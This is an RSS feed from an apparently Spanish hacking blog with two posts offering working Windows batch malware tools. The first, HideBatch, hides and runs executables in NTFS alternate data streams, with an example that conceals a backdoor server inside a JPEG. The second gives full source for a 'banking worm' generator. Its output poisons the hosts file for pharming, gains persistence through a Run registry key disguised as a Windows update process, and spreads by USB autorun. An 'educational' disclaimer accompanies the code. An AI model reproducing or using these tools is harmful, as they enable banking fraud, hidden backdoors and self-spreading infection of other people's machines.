<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Aztek Mindz &#187; Script</title>
	<atom:link href="http://www.aztekmindz.org/category/script/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.aztekmindz.org</link>
	<description>Inseguridad informatica y Laboratorio virico</description>
	<pubDate>Mon, 08 Dec 2008 13:39:24 +0000</pubDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
			<item>
		<title>HideBatch NTFS ADS Ocultacion Avanzada de Archivos</title>
		<link>http://www.aztekmindz.org/2008/08/09/hidebatch-ntfs-ads-ocultacion-avanzada-de-archivos/</link>
		<comments>http://www.aztekmindz.org/2008/08/09/hidebatch-ntfs-ads-ocultacion-avanzada-de-archivos/#comments</comments>
		<pubDate>Sun, 10 Aug 2008 01:25:45 +0000</pubDate>
		<dc:creator>octalh</dc:creator>
		
		<category><![CDATA[Inseguridad]]></category>

		<category><![CDATA[Script]]></category>

		<guid isPermaLink="false">http://www.aztekmindz.org/?p=177</guid>
		<description><![CDATA[Todos los Windows NT nos ofrecen la posibilidad de instalar el S.O bajo un sistema de ficheros llamado NTFS, que supuestamente es más “seguro”  que Fat32, porque nos da la oportunidad de crear políticas de acceso a nuestros ficheros, este sistema cuenta con una capacidad no documentada que nos permite usar los ADS (alternate [...]]]></description>
			<content:encoded><![CDATA[<p>Todos los Windows NT nos ofrecen la posibilidad de instalar el S.O bajo un sistema de ficheros llamado NTFS, que supuestamente es más “seguro”  que Fat32, porque nos da la oportunidad de crear políticas de acceso a nuestros ficheros, este sistema cuenta con una capacidad no documentada que nos permite usar los ADS (alternate dada stream), esta capacidad nos permite asociar información a un archivo o a un directorio, y existe para crear compatibilidad con el HFS (sistema de archivos de macintosh hierarchical file system), cuando asociamos archivo 1 a un archivo 2, permanece invariable, pero contiene el archivo 1 en esa seccion no documentada que en realidad esta apuntando a archivo2, lo que nos da la sensacion de &#8220;meter&#8221; todo un archivo dentro de otro.</p>
<p>¿Pero que beneficios nos trae?<br />
Bueno entre varias cosas podemos ocultar un archivo de 100MB dentro de un txt de 1KB si así lo quisiéramos, o en dado caso podríamos incluso ocultar algún tipo de backdoor o malware dentro de un proceso critico del sistema.</p>
<p>Para seguir las practicas he realizado un pequeño batch script que nos automatiza el proceso de ocultación.</p>
<div class="captionfull"><img src="http://www.aztekmindz.org/wp-content/uploads/2008/08/hb.gif" alt="HideBatch" /></div>
<p>hidebatch.bat</p>
<div class="dean_ch" style="white-space: wrap;">@<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> off<br />
color C<br />
cls<br />
title HideBatch NTFS ADS by Octalh <span class="br0">&#91;</span> www.aztekmindz.org <span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/if.html"><span class="kw1">if</span></a> &quot;%<span class="re2"><span class="nu0">1</span></span>&quot; == &quot;&quot; &nbsp; &nbsp;<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">portada</span><br />
<a href="http://www.ss64.com/nt/if.html"><span class="kw1">if</span></a> &quot;%<span class="re2"><span class="nu0">1</span></span>&quot; == &quot;-h&quot; &nbsp;<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">ocultar</span><br />
<a href="http://www.ss64.com/nt/if.html"><span class="kw1">if</span></a> &quot;%<span class="re2"><span class="nu0">1</span></span>&quot; == &quot;-u&quot; &nbsp;<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">mostrar</span><br />
<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">fin</span><br />
:<span class="re0">portada</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; www.aztekmindz.org :<span class="re0">: octalh@gmail.com</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;_ &nbsp; &nbsp; _ &nbsp; &nbsp; _ &nbsp; &nbsp; &nbsp; _ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; ^| ^| &nbsp; ^<span class="br0">&#40;</span>_^<span class="br0">&#41;</span> &nbsp; ^| ^| &nbsp; &nbsp; ^| ^| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_ &nbsp; &nbsp; &nbsp; ^| ^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; ^| ^|__ &nbsp;_ &nbsp;__^| ^|_____^| ^|__ &nbsp;_____ _^| ^|_ ____^| ^|__<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; ^| &nbsp;_ \^| ^|/ _ &nbsp;^| ___ ^| &nbsp;_ \^<span class="br0">&#40;</span>____ ^<span class="br0">&#40;</span>_ &nbsp; _^<span class="br0">&#41;</span> ___^<span class="br0">&#41;</span> &nbsp;_ \<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; ^| ^| ^| ^| ^<span class="br0">&#40;</span> ^<span class="br0">&#40;</span>_^| ^| ____^| ^|_^<span class="br0">&#41;</span> ^<span class="br0">&#41;</span> ___ ^| ^| ^|^<span class="br0">&#40;</span> ^<span class="br0">&#40;</span>___^| ^| ^| ^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; ^|_^| ^|_^|_^|\____^|_____^<span class="br0">&#41;</span>____/\_____^| &nbsp;\__^<span class="br0">&#41;</span>____^<span class="br0">&#41;</span>_^| ^|_^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; - &nbsp;Advanced Hide ^| Unhide NTFS File System &nbsp;-<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; - &nbsp;By Octalh -<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;USO: hidebatch <span class="br0">&#91;</span>-h<span class="br0">&#93;</span> / <span class="br0">&#91;</span>-u<span class="br0">&#93;</span> <span class="br0">&#91;</span>Archivo <span class="nu0">1</span><span class="br0">&#93;</span> <span class="br0">&#91;</span>Archivo <span class="nu0">2</span><span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;<span class="br0">&#123;</span> -h <span class="br0">&#125;</span> &nbsp; &nbsp; &nbsp; &nbsp; Oculta un archivo dentro de otro<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;<span class="br0">&#123;</span> -u <span class="br0">&#125;</span> &nbsp; &nbsp; &nbsp; &nbsp; Ejecuta un archivo oculto<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;<span class="br0">&#123;</span> Archivo <span class="nu0">1</span> <span class="br0">&#125;</span> &nbsp;Archivo a ocultar<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;<span class="br0">&#123;</span> Archivo <span class="nu0">2</span> <span class="br0">&#125;</span> &nbsp;Archivo donde se ocultara Archivo <span class="nu0">1</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;Ejemplo:<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;Ocultar archivo: &nbsp; &nbsp; &nbsp; &nbsp; hidebatch -h secreto.txt cancion.mp3<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp;Ejecutar archivo oculto: hidebatch -u secreto.txt cancion.mp3<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
pause&gt;nul<br />
<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">fin</span><br />
:<span class="re0">ocultar</span><br />
type %<span class="re2"><span class="nu0">2</span></span> &gt;%<span class="re2"><span class="nu0">3</span></span>:%<span class="re2"><span class="nu0">2</span></span><br />
<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">fin</span><br />
:<span class="re0">mostrar</span><br />
Start .\%<span class="re2"><span class="nu0">3</span></span>:%<span class="re2"><span class="nu0">2</span></span><br />
<a href="http://www.ss64.com/nt/goto.html"><span class="kw1">goto</span></a> <span class="re0">fin</span><br />
:<span class="re0">fin</span></div>
<p>.</p>
<p>Suponiendo que queremos ocultar servidor.exe dentro de foto_xxx.jpg<br />
Solo tenemos que ejecutar HideBatch de la siguiente manera:</p>
<div class="dean_ch" style="white-space: wrap;">hidebatch.bat -h servidor.exe foto_xxx.jpg</div>
<p>Ahora podemos proceder a eliminar servidor.exe pues ya se encuentra oculto en foto_xxx.jpg</p>
<div class="dean_ch" style="white-space: wrap;">del servidor.exe</div>
<p>Y ahora para ejecutar servidor.exe hacemos lo siguiente.</p>
<div class="dean_ch" style="white-space: wrap;">hidebatch.bat -u servidor.exe foto_xxx.jpg</div>
<p>Con esto damos por terminada esta breve explicación de los ADS y claro esperemos que ahora tengan mas conciencia sobre lo indefenso que puede estar un administrador promedio frente a este tipo de ataques.</p>
<p>Ya sabes como siempre cualquier duda un E-mail</p>
]]></content:encoded>
			<wfw:commentRss>http://www.aztekmindz.org/2008/08/09/hidebatch-ntfs-ads-ocultacion-avanzada-de-archivos/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Generador de Gusano bancario ( Pharming ) Batch</title>
		<link>http://www.aztekmindz.org/2008/06/28/generador-de-gusano-bancario-pharming-batch/</link>
		<comments>http://www.aztekmindz.org/2008/06/28/generador-de-gusano-bancario-pharming-batch/#comments</comments>
		<pubDate>Sat, 28 Jun 2008 09:50:49 +0000</pubDate>
		<dc:creator>octalh</dc:creator>
		
		<category><![CDATA[Script]]></category>

		<guid isPermaLink="false">http://www.aztekmindz.org/?p=35</guid>
		<description><![CDATA[
Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )
Código 100% Educativo para demostrar únicamente la facilidad en  que un atacante puede afectarnos realizando este tipo de técnicas [...]]]></description>
			<content:encoded><![CDATA[<div class="captionfull"><img src="http://www.aztekmindz.org/wp-content/uploads/2008/06/sh.gif" alt="" /></div>
<p>Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )</p>
<p>Código 100% Educativo para demostrar únicamente la facilidad en  que un atacante puede afectarnos realizando este tipo de técnicas en nuestra contra.</p>
<div class="dean_ch" style="white-space: wrap;">@<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> off<br />
<a href="http://www.ss64.com/nt/setlocal.html"><span class="kw3">setlocal</span></a> EnableDelayedExpansion<br />
color A<br />
cls<br />
title b4nking-w0rm &nbsp;by Octalh <span class="br0">&#91;</span> www.aztekmindz.org <span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>+<span class="br0">&#93;</span>====================<span class="br0">&#91;</span> b4nking-worm <span class="br0">&#93;</span>====================<span class="br0">&#91;</span>+<span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_ &nbsp; &nbsp; &nbsp; _ &nbsp; &nbsp; &nbsp;__ &nbsp;__ _ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; _<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /\ &nbsp; &nbsp; &nbsp; &nbsp;^| ^| &nbsp; &nbsp; ^| ^| &nbsp; &nbsp;^| &nbsp;\/ &nbsp;^<span class="br0">&#40;</span>_^<span class="br0">&#41;</span> &nbsp; &nbsp; &nbsp; &nbsp; ^| ^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/ &nbsp;\ &nbsp; &nbsp;___^| ^|_ ___^| ^| __ ^| \ &nbsp;/ ^|_ _ __ &nbsp; __^| ^|____<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; / /\ \ &nbsp;^|_ &nbsp;/ __/ _ \ ^|/ / ^| ^|\/^| ^| ^| &#8216;_ \ / _` ^|_ &nbsp;/<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/ ____ \ &nbsp;/ /^| ^|^| &nbsp;__/ &nbsp; ^&lt; &nbsp;^| ^| &nbsp;^| ^| ^| ^| ^| ^| <span class="br0">&#40;</span>_^| ^|/ /<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /_/ &nbsp; &nbsp;\_\/___^|\__\___^|_^|\_\ ^|_^| &nbsp;^|_^|_^|_^| ^|_^|\__,_/___^|<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; www.aztekmindz.org octalh@gmail.com<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; - Generador de Gusano bancario ^<span class="br0">&#40;</span> Pharming ^<span class="br0">&#41;</span> Batch<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; - Testeado XP SP2<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; - Programado <a href="http://www.ss64.com/nt/con.html"><span class="kw4">con</span></a> fines educativos<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; - El autor no se hace responsable de<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; usos malintencionados.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>+<span class="br0">&#93;</span>====================<span class="br0">&#91;</span> b4nking-worm <span class="br0">&#93;</span>====================<span class="br0">&#91;</span>+<span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/set.html"><span class="kw3">set</span></a> /P <span class="re1">nombre</span>= &nbsp; &nbsp; &nbsp; <span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span> Ingrese nombre del gusano:<br />
:<span class="re0">:header</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> @<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> off &gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">: &nbsp; &nbsp; &nbsp; &nbsp; + <span class="br0">&#91;</span> b4nking-worm <span class="br0">&#93;</span> + &nbsp; &nbsp; &nbsp; &nbsp; &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">: www.aztekmindz.org octalh@gmail.com &nbsp;&gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">: &nbsp; - Generador Gusano bancario - &nbsp; &nbsp; &nbsp;&gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
:<span class="re0">:copiado</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> COPY %%<span class="nu0">0</span> &quot;%<span class="re2">WINDIR</span>%\%<span class="re2">nombre</span>%.bat&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/set.html"><span class="kw3">set</span></a> /P <span class="re1">ch</span>= &nbsp; &nbsp; &nbsp; <span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span> Ingrese cantidad de hosts a ingresar:<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span> Ingrese la IP y el host separados por un espacio:<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;Ejemplo: <span class="nu0">127.0</span><span class="nu0">.0</span><span class="nu0">.1</span> localhost<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.</p>
<p><a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/set.html"><span class="kw3">SET</span></a> <span class="re1">htxt</span>=C:\WINDOWS\system32\drivers\etc\hosts &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/if.html"><span class="kw1">IF</span></a> <a href="http://www.ss64.com/nt/exist.html"><span class="kw2">EXIST</span></a> %%htxt%% <span class="br0">&#40;</span> &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> # <span class="br0">&#91;</span>+<span class="br0">&#93;</span>====<span class="br0">&#91;</span> b4nking w0rm by octalh <span class="br0">&#93;</span>====<span class="br0">&#91;</span>+<span class="br0">&#93;</span> ^&gt;^&gt;%%htxt%% &gt;&gt;%<span class="re2">nombre</span>%.bat</p>
<p><a href="http://www.ss64.com/nt/for.html"><span class="kw1">FOR</span></a> /L %%i <a href="http://www.ss64.com/nt/in.html"><span class="kw1">IN</span></a> <span class="br0">&#40;</span><span class="nu0">1</span>,<span class="nu0">1</span>,%<span class="re2">ch</span>%<span class="br0">&#41;</span> <a href="http://www.ss64.com/nt/do.html"><span class="kw1">DO</span></a> <span class="br0">&#40;</span><br />
:<span class="re0">:Host</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span> Almacenando Host %%i de %<span class="re2">ch</span>% <span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/set.html"><span class="kw3">set</span></a> /P <span class="re1">hs</span>= &nbsp; &nbsp; &nbsp; Host:<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> !hs! ^&gt;^&gt;%%htxt%% &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<span class="br0">&#41;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> # <span class="br0">&#91;</span>+<span class="br0">&#93;</span>====<span class="br0">&#91;</span> b4nking w0rm by octalh <span class="br0">&#93;</span>====<span class="br0">&#91;</span>+<span class="br0">&#93;</span> ^&gt;^&gt;%%htxt%% &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <span class="br0">&#41;</span> &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> ipconfig /flushdns &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/set.html"><span class="kw3">set</span></a> /p <span class="re1">ai</span>= &nbsp; &nbsp; &nbsp; <span class="br0">&#91;</span><span class="nu0">4</span><span class="br0">&#93;</span> Activar Autoinicio? S/N:<br />
<a href="http://www.ss64.com/nt/if.html"><span class="kw1">if</span></a> %<span class="re2">ai</span>%==s <span class="br0">&#40;</span><br />
:<span class="re0">:Autoinicio</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d &quot;%<span class="re2">WINDIR</span>%\%<span class="re2">nombre</span>%.bat&quot; /f &gt;&gt; %<span class="re2">nombre</span>%.bat<br />
<span class="br0">&#41;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/set.html"><span class="kw3">set</span></a> /p <span class="re1">usb</span>= &nbsp; &nbsp; &nbsp; <span class="br0">&#91;</span><span class="nu0">5</span><span class="br0">&#93;</span> Activar Propagacion USB? S/N:<br />
<a href="http://www.ss64.com/nt/if.html"><span class="kw1">if</span></a> %<span class="re2">usb</span>%==s <span class="br0">&#40;</span><br />
:<span class="re0">:USB</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">inicio &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/for.html"><span class="kw1">FOR</span></a> %%%%A <a href="http://www.ss64.com/nt/in.html"><span class="kw1">IN</span></a> ^<span class="br0">&#40;</span>D F G H I J K L M N O P Q R S T U V W X Y Z^<span class="br0">&#41;</span> <a href="http://www.ss64.com/nt/do.html"><span class="kw1">DO</span></a> <a href="http://www.ss64.com/nt/call.html"><span class="kw1">CALL</span></a> :<span class="re0">verificar %%%%A &nbsp;&gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/goto.html"><span class="kw1">GOTO</span></a> <span class="re0">:EOF &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">verificar &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/if.html"><span class="kw1">IF</span></a> <a href="http://www.ss64.com/nt/exist.html"><span class="kw2">EXIST</span></a> &quot;%%<span class="nu0">1</span>:&quot; ^<span class="br0">&#40;</span><a href="http://www.ss64.com/nt/call.html"><span class="kw1">CALL</span></a> :<span class="re0">copiado %%<span class="nu0">1</span>^<span class="br0">&#41;</span> &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/goto.html"><span class="kw1">GOTO</span></a> <span class="re0">:EOF &nbsp;&gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> :<span class="re0">copiado &nbsp;&gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> COPY %<span class="re2">nombre</span>%.bat &quot;%%<span class="nu0">1</span>:\<span class="nu0">145782</span>.bat&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <span class="br0">&#91;</span>AUTORUN<span class="br0">&#93;</span> ^&gt; &quot;%%<span class="nu0">1</span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> shell\<span class="nu0">1</span>=abrir ^&gt;^&gt;&quot;%<span class="re2"><span class="nu0">1</span></span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> shell\<span class="nu0">1</span>\Command=&quot;%<span class="re2">nombre</span>%.bat&quot; ^&gt;^&gt;&quot;%%<span class="nu0">1</span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> shell\<span class="nu0">2</span>=explorar ^&gt;^&gt;&quot;%%<span class="nu0">1</span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> shell\<span class="nu0">2</span>\Command=&quot;%<span class="re2">nombre</span>%.bat&quot; ^&gt;^&gt;&quot;%%<span class="nu0">1</span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> shellexecute= &quot;\%<span class="re2">nombre</span>%.bat&quot; ^&gt;^&gt;&quot;%%<span class="nu0">1</span>:\AUTORUN.INF&quot; &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> ping -n <span class="nu0">10</span> localhost &gt;&gt;%<span class="re2">nombre</span>%.bat<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> <a href="http://www.ss64.com/nt/goto.html"><span class="kw1">GOTO</span></a> <span class="re0">:inicio &gt;&gt;%<span class="re2">nombre</span>%.bat</span><br />
<span class="br0">&#41;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp;<span class="br0">&#91;</span>+<span class="br0">&#93;</span>====================<span class="br0">&#91;</span> b4nking-worm <span class="br0">&#93;</span>====================<span class="br0">&#91;</span>+<span class="br0">&#93;</span><br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#91;</span>OK<span class="br0">&#93;</span> Gusano editado <a href="http://www.ss64.com/nt/con.html"><span class="kw4">con</span></a> exito<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Presione cualquier tecla para salir<br />
<a href="http://www.ss64.com/nt/echo.html"><span class="kw3">echo</span></a>.<br />
